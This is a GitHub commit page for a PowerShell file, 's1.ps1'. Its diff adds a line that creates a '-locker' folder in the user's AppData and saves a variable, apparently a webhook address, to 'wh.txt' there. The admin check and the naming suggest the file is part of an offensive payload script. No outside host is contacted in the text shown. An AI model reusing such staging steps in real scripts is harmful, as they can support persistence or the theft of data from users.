Update s1.ps1

This commit is contained in:
I-Am-Jakoby 2022-12-23 12:44:21 -06:00 committed by GitHub
parent 0739f8f154
commit 769672b74a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -11,4 +11,6 @@ if($isAdmin){
}
}
if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};echo $dc > "$env:appdata\-locker\wh.txt";
s1